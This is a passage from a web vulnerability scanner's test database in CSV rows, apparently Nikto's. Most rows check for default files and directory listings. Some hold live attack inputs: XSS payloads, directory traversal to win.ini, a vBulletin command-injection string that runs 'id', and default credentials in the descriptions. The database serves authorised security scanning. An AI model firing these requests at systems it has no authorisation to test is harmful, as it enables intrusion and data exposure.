removed.\",\"\",\"\"\n\"002872\",\"3233\",\"2\",\"/help/home.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default Netscape manual found. All default pages should be removed.\",\"\",\"\"\n\"002873\",\"3233\",\"2\",\"/manual/ag/esperfrm.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default Netscape manual found. All default pages should be removed.\",\"\",\"\"\n\"002874\",\"3233\",\"2\",\"/nethome/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netscape Enterprise Server default doc/manual directory. Reveals server path at bottom of page.\",\"\",\"\"\n\"002875\",\"3233\",\"2\",\"/com/novell/gwmonitor/help/en/default.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netware gateway monitor access documentation found. All default documentation should be removed from web servers.\",\"\",\"\"\n\"002876\",\"3233\",\"2\",\"/com/novell/webaccess/help/en/default.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netware web access documentation found. All default documentation should be removed from web servers.\",\"\",\"\"\n\"002877\",\"3233\",\"2\",\"/com/novell/webpublisher/help/en/default.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netware web publisher documentation found. All default documentation should be removed from web servers.\",\"\",\"\"\n\"002878\",\"3233\",\"2\",\"/servlet/AdminServlet\",\"GET\",\"200\",\"\",\"\",\"<title>Axis<\\/title>\",\"\",\"Netware Web Search Server (adminservlet) found. All default code should be removed from web servers.\",\"\",\"\"\n\"002879\",\"3233\",\"2\",\"/servlet/gwmonitor\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netware Gateway monitor found. All default code should be removed from web servers.\",\"\",\"\"\n\"002880\",\"3233\",\"2\",\"/servlet/PrintServlet\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Novell Netware default servlet found. All default code should be removed from the system.\",\"\",\"\"\n\"002881\",\"3233\",\"2\",\"/servlet/SearchServlet\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Novell Netware default servlet found. All default code should be removed from the system.\",\"\",\"\"\n\"002882\",\"3233\",\"2\",\"/servlet/ServletManager\",\"GET\",\"401\",\"\",\"\",\"\",\"\",\"Netware Java Servlet Gateway found. Default user ID is servlet, default password is manager. All default code should be removed from Internet servers.\",\"\",\"\"\n\"002883\",\"3233\",\"2\",\"/servlet/sq1cdsn\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Novell Netware default servlet found. All default code should be removed from the system.\",\"\",\"\"\n\"002884\",\"3233\",\"2\",\"/servlet/sqlcdsn\",\"GET\",\"401\",\"\",\"\",\"\",\"\",\"Netware SQL connector found. All default code should be removed from web servers.\",\"\",\"\"\n\"002885\",\"3233\",\"2\",\"/servlet/webacc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netware Enterprise and/or GroupWise web access found. All default code should be removed from Internet servers.\",\"\",\"\"\n\"002886\",\"3233\",\"2\",\"/servlet/webpub\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netware Web Publisher found. All default code should be removed from web servers.\",\"\",\"\"\n\"002887\",\"3233\",\"2\",\"/WebSphereSamples\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netware Webshere sample applications found. All default code should be removed from web servers.\",\"\",\"\"\n\"002888\",\"3233\",\"2\",\"@CGIDIRScgi-test.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default CGI found\",\"\",\"\"\n\"002934\",\"3233\",\"2\",\"/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse\",\"GET\",\"SERVER_SOFTWARE\",\"\",\"\",\"\",\"\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.\",\"\",\"\"\n\"002935\",\"3233\",\"2\",\"/lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse\",\"GET\",\"SCRIPT_NAME\",\"\",\"\",\"\",\"\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.\",\"\",\"\"\n\"002936\",\"3233\",\"2\",\"/netbasic/websinfo.bas\",\"GET\",\"Company:\",\"\",\"Revision:\\sNetWare\",\"\",\"\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed. CVE-2002-1634\",\"\",\"\"\n\"002937\",\"3233\",\"2\",\"/perl/env.pl\",\"GET\",\"HSERVER_SOFTWARE\",\"\",\"\",\"\",\"\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.\",\"\",\"\"\n\"002938\",\"3233\",\"2\",\"/perl/samples/env.pl\",\"GET\",\"HSERVER_SOFTWARE\",\"\",\"\",\"\",\"\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.\",\"\",\"\"\n\"002939\",\"3233\",\"2\",\"/perl/samples/lancgi.pl\",\"GET\",\"Lan Boards\",\"\",\"\",\"\",\"\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.\",\"\",\"\"\n\"002940\",\"3233\",\"2\",\"/perl/samples/ndslogin.pl\",\"GET\",\"Fullname\",\"\",\"\",\"\",\"\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.\",\"\",\"\"\n\"002941\",\"3233\",\"2\",\"/perl/samples/volscgi.pl\",\"GET\",\"Size\",\"\",\"200\",\"\",\"\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.\",\"\",\"\"\n\"002942\",\"3233\",\"2\",\"/se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse\",\"GET\",\"SERVER_SOFTWARE\",\"\",\"\",\"\",\"\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.\",\"\",\"\"\n\"002943\",\"3233\",\"2\",\"/index.html.ca\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002944\",\"3233\",\"2\",\"/index.html.cz.iso8859-2\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002945\",\"3233\",\"2\",\"/index.html.de\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002946\",\"3233\",\"2\",\"/index.html.dk\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002947\",\"3233\",\"2\",\"/index.html.ee\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002948\",\"3233\",\"2\",\"/index.html.el\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002949\",\"3233\",\"2\",\"/index.html.en\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002950\",\"3233\",\"2\",\"/index.html.es\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002951\",\"3233\",\"2\",\"/index.html.et\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002952\",\"3233\",\"2\",\"/index.html.fr\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002953\",\"3233\",\"2\",\"/index.html.he.iso8859-8\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002954\",\"3233\",\"2\",\"/index.html.hr.iso8859-2\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002955\",\"3233\",\"2\",\"/index.html.it\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002956\",\"3233\",\"2\",\"/index.html.ja.iso2022-jp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002957\",\"3233\",\"2\",\"/index.html.kr.iso2022-kr\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002958\",\"3233\",\"2\",\"/index.html.ltz.utf8\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002959\",\"3233\",\"2\",\"/index.html.lu.utf8\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002960\",\"3233\",\"2\",\"/index.html.nl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002961\",\"3233\",\"2\",\"/index.html.nn\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002962\",\"3233\",\"2\",\"/index.html.no\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002963\",\"3233\",\"2\",\"/index.html.po.iso8859-2\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002964\",\"3233\",\"2\",\"/index.html.pt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002965\",\"3233\",\"2\",\"/index.html.pt-br\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002966\",\"3233\",\"2\",\"/index.html.ru.cp-1251\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002967\",\"3233\",\"2\",\"/index.html.ru.cp866\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002968\",\"3233\",\"2\",\"/index.html.ru.iso-ru\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002969\",\"3233\",\"2\",\"/index.html.ru.koi8-r\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002970\",\"3233\",\"2\",\"/index.html.ru.utf8\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002971\",\"3233\",\"2\",\"/index.html.se\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002972\",\"3233\",\"2\",\"/index.html.tw\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002973\",\"3233\",\"2\",\"/index.html.tw.Big5\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002974\",\"3233\",\"2\",\"/index.html.var\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002975\",\"3233\",\"2\",\"/test\",\"GET\",\"test hierarchy\",\"\",\"\",\"\",\"\",\"Apache Tomcat default file found. All default files should be removed.\",\"\",\"\"\n\"002976\",\"3233\",\"2\",\"/iissamples/issamples/codebrws.asp\",\"GET\",\"Sample ASP Search Form\",\"\",\"\",\"\",\"\",\"This is a default IIS script/file which should be  removed. CVE-1999-0739. MS99-013.\",\"\",\"\"\n\"002977\",\"3233\",\"2\",\"/iissamples/issamples/ixqlang.htm\",\"GET\",\"Query Language\",\"\",\"\",\"\",\"\",\"IIS default file found. All default files should be removed.\",\"\",\"\"\n\"002978\",\"3233\",\"2\",\"/iissamples/issamples/Winmsdp.exe\",\"GET\",\"Sample ASP Search Form\",\"\",\"\",\"\",\"\",\"This is a default IIS script/file that should be removed. CVE-1999-0738. MS99-013.\",\"\",\"\"\n\"002979\",\"3233\",\"2\",\"/iissamples/sdk/asp/docs/codebrw2.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This is a default IIS script/file that should be removed. CVE-1999-0739. MS99-013.\",\"\",\"\"\n\"002980\",\"3233\",\"2\",\"/iissamples/sdk/asp/docs/codebrws.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This is a default IIS script/file that should be removed. CVE-1999-0739. MS99-013.\",\"\",\"\"\n\"002981\",\"3233\",\"2\",\"/iissamples/sdk/asp/docs/Winmsdp.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This is a default IIS script/file that should be removed. CVE-1999-0738. MS99-013.\",\"\",\"\"\n\"002982\",\"3233\",\"2\",\"/mc-icons/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed.\",\"\",\"\"\n\"002983\",\"3233\",\"2\",\"/ns-icons/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed.\",\"\",\"\"\n\"002984\",\"3233\",\"3\",\"@CGIDIRSprintenv\",\"GET\",\"DOCUMENT_ROOT\",\"\",\"\",\"\",\"\",\"Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. BID-4431.\",\"\",\"\"\n\"002985\",\"3233\",\"3\",\"@CGIDIRSprintenv\",\"GET\",\"Premature end of script headers: \\/\",\"\",\"\",\"\",\"\",\"Apache 2.0 printenv default script does not have execute permissions but leaks file system paths. It may also allow XSS types of attacks. BID-4431.\",\"\",\"\"\n\"002986\",\"3233\",\"3\",\"@CGIDIRStest-cgi\",\"GET\",\"PATH_TRANSLATED\",\"\",\"\",\"\",\"\",\"Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.\",\"\",\"\"\n\"002987\",\"3233\",\"3\",\"@CGIDIRStest-cgi\",\"GET\",\"Premature end of script headers: \\/\",\"\",\"\",\"\",\"\",\"Apache 2.0 printenv default script does not have execute permissions but leaks file system paths.\",\"\",\"\"\n\"002988\",\"3233\",\"3\",\"/pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E\",\"GET\",\"Edit Database\",\"\",\"\",\"\",\"\",\"Oracle admin page may reveal passwords in a prebuilt form and reveal database information.\",\"\",\"\"\n\"002989\",\"3233\",\"3\",\"@PHPINFODIRS@PHPINFOFILES\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.\",\"\",\"\"\n\"002993\",\"3233\",\"b\",\"/NetDetector/middle_help_intro.htm\",\"GET\",\"NIKSUN-HELP\",\"\",\"\",\"\",\"\",\"The system appears to be a Niksun NetDetector (network monitoring). The help files should be available at /NetDetector/quick_help_index.html\",\"\",\"\"\n\"002994\",\"3233\",\"b\",\"/a/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"May be Kebi Web Mail administration menu.\",\"\",\"\"\n\"002995\",\"3233\",\"b\",\"/basilix/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"BasiliX webmail application. Default mysql database name is 'BASILIX' with password 'bsxpass'\",\"\",\"\"\n\"002996\",\"3233\",\"b\",\"/bottom.html\",\"GET\",\"Topaz Prism\",\"\",\"\",\"\",\"\",\"Topaz Prism appears to be running, try login with admin/admin.\",\"\",\"\"\n\"002997\",\"3233\",\"b\",\"/interchange/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Interchange chat is installed. Look for a high-numbered port like 20xx to find it running.\",\"\",\"\"\n\"002998\",\"3233\",\"b\",\"/sca/menu.jsp\",\"GET\",\"Service Control Agent\",\"\",\"\",\"\",\"\",\"Entrust GetAccess Service Control Agent is installed.\",\"\",\"\"\n\"002999\",\"3233\",\"b\",\"/\",\"SEARCH\",\"Length Required\",\"\",\"\",\"\",\"\",\"WebDAV is installed.\\n\",\";\",\"\"\n\"003000\",\"3268\",\"2\",\"/icons/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003001\",\"3268\",\"2\",\"/manual/images/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003002\",\"3268\",\"2\",\"/com/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003003\",\"3268\",\"2\",\"/COM/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003004\",\"3268\",\"2\",\"/doc/packages/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003005\",\"3268\",\"2\",\"/image/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003006\",\"3268\",\"2\",\"/javax/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003007\",\"3268\",\"2\",\"/perl/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003008\",\"3268\",\"2\",\"/scripts/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003009\",\"3268\",\"2\",\"/SUNWmc/htdocs/en_US/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory found. This is likely a Sun Solstice installation.\",\"\",\"\"\n\"003010\",\"3268\",\"2\",\"/search/inc/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found. This is likely Sun One Webserver 6.1 search.\",\"\",\"\"\n\"003011\",\"3268\",\"2\",\"/images/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003012\",\"3268\",\"3\",\"/docs/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003013\",\"3268\",\"3\",\"/examples/\",\"GET\",\"Directory Listing\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003014\",\"3268\",\"3\",\"/style/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003015\",\"3268\",\"3\",\"/styles/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003016\",\"3280\",\"3\",\"/forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\\\">\\\"<script>javascript:alert(document.cookie)</script>\",\"GET\",\"<script>javascript:alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Vbulletin 2.2.9 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003017\",\"3281\",\"4\",\"/search.asp?Search=\\\">&lt;script&gt;alert(Vulnerable)&lt;/script&gt;\",\"GET\",\">\\&lt;script\\&gt;alert\\(\\)\\&lt;\\/script\\&gt;\",\"\",\"\",\"\",\"\",\"Max Web Portal is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003018\",\"3282\",\"8\",\"/uploader.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This script may allow arbitrary files to be uploaded to the remote server.\",\"\",\"\"\n\"003019\",\"3284\",\"3\",\"/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp\",\"GET\",\"Path not found\",\"\",\"\",\"\",\"\",\"Winmsdp.exe can be used to determine if a file system path exists or not. CVE-1999-0738. MS99-013.\",\"\",\"\"\n\"003020\",\"3284\",\"5\",\"/iissamples/sdk/asp/docs/Winmsdp.exe\",\"GET\",\"View Active Server Page Source\",\"\",\"\",\"\",\"\",\"IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed. CVE-1999-0738. MS99-013.\",\"\",\"\"\n\"003021\",\"3284\",\"5\",\"/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"IIS may be vulnerable to source code viewing via the example Winmsdp.exe file. Remove all default files from the web root. CVE-1999-0738. MS99-013.\",\"\",\"\"\n\"003022\",\"3284\",\"6\",\"/iissamples/exair/howitworks/Winmsdp.exe\",\"GET\",\"ASP Source code browser\",\"\",\"\",\"\",\"\",\"This is a default IIS script/file that should be removed. It may allow a DoS against the server. CVE-1999-1451, XF-2371, MS99-013 and MSKB-Q231368\",\"\",\"\"\n\"003023\",\"3285\",\"7\",\"/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version.\",\"\",\"\"\n\"003024\",\"3285\",\"7\",\"/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini\",\"GET\",\"\\[windows\\]\",\"\",\"\",\"\",\"\",\"Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version.\",\"\",\"\"\n\"003025\",\"3286\",\"5\",\"/conspass.chl+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081\",\"\",\"\"\n\"003026\",\"3286\",\"5\",\"/consport.chl+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081\",\"\",\"\"\n\"003027\",\"3286\",\"5\",\"/general.chl+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081\",\"\",\"\"\n\"003028\",\"3286\",\"5\",\"/srvstatus.chl+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081\",\"\",\"\"\n\"003029\",\"3288\",\"3\",\"///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Abyss 1.03 reveals directory listing when \t /'s are requested.\",\"\",\"\"\n\"003030\",\"3289\",\"4\",\"/firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.\",\"\",\"\"\n\"003031\",\"3294\",\"4\",\"/firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.\",\"\",\"\"\n\"003032\",\"3295\",\"4\",\"/antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.\",\"\",\"\"\n\"003033\",\"3295\",\"4\",\"/antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.\",\"\",\"\"\n\"003034\",\"3296\",\"4\",\"/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session\",\"GET\",\"><script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.\",\"\",\"\"\n\"003035\",\"3296\",\"4\",\"/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\\\"><script>alert('Vulnerable')</script>,/system/status/session\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.\",\"\",\"\"\n\"003036\",\"3296\",\"4\",\"/theme1/selector?button=status,monitor,session&button_url=/system/status/status\\\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.\",\"\",\"\"\n\"003037\",\"3296\",\"4\",\"/theme1/selector?button=status,monitor,session\\\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.\",\"\",\"\"\n\"003038\",\"3297\",\"4\",\"/search.asp?Search=\",\"GET\",\">\\&lt;script\\&gt;alert\\(Vulnerable\\)\\&lt;\\/script\\&gt;\",\"\",\"\",\"\",\"\",\"Snitz 3.4.0.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003039\",\"3299\",\"8\",\"@FORUMcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22\",\"GET\",\"uid=\",\"\",\"\",\"\",\"\",\"Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html\",\"\",\"\"\n\"003040\",\"3299\",\"8\",\"@VBULLETINcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22\",\"GET\",\"uid=\",\"\",\"\",\"\",\"\",\"Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html\",\"\",\"\"\n\"003045\",\"3300\",\"6\",\"/_vti_bin/\",\"GET\",\"shtml\\.dll\",\"shtml\\.exe\",\"\",\"\",\"\",\"shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).\",\"\",\"\"\n\"003047\",\"3323\",\"6d\",\"/NULL.printer\",\"GET\",\"Error in web printer install\",\"\",\"\",\"\",\"\",\"Internet Printing (IPP) is enabled. Some versions have a buffer overflow/DoS in Windows 2000 that allows remote attackers to gain admin privileges via a long print request that is passed to the extension through IIS 5.0. Disabling the .printer mapping 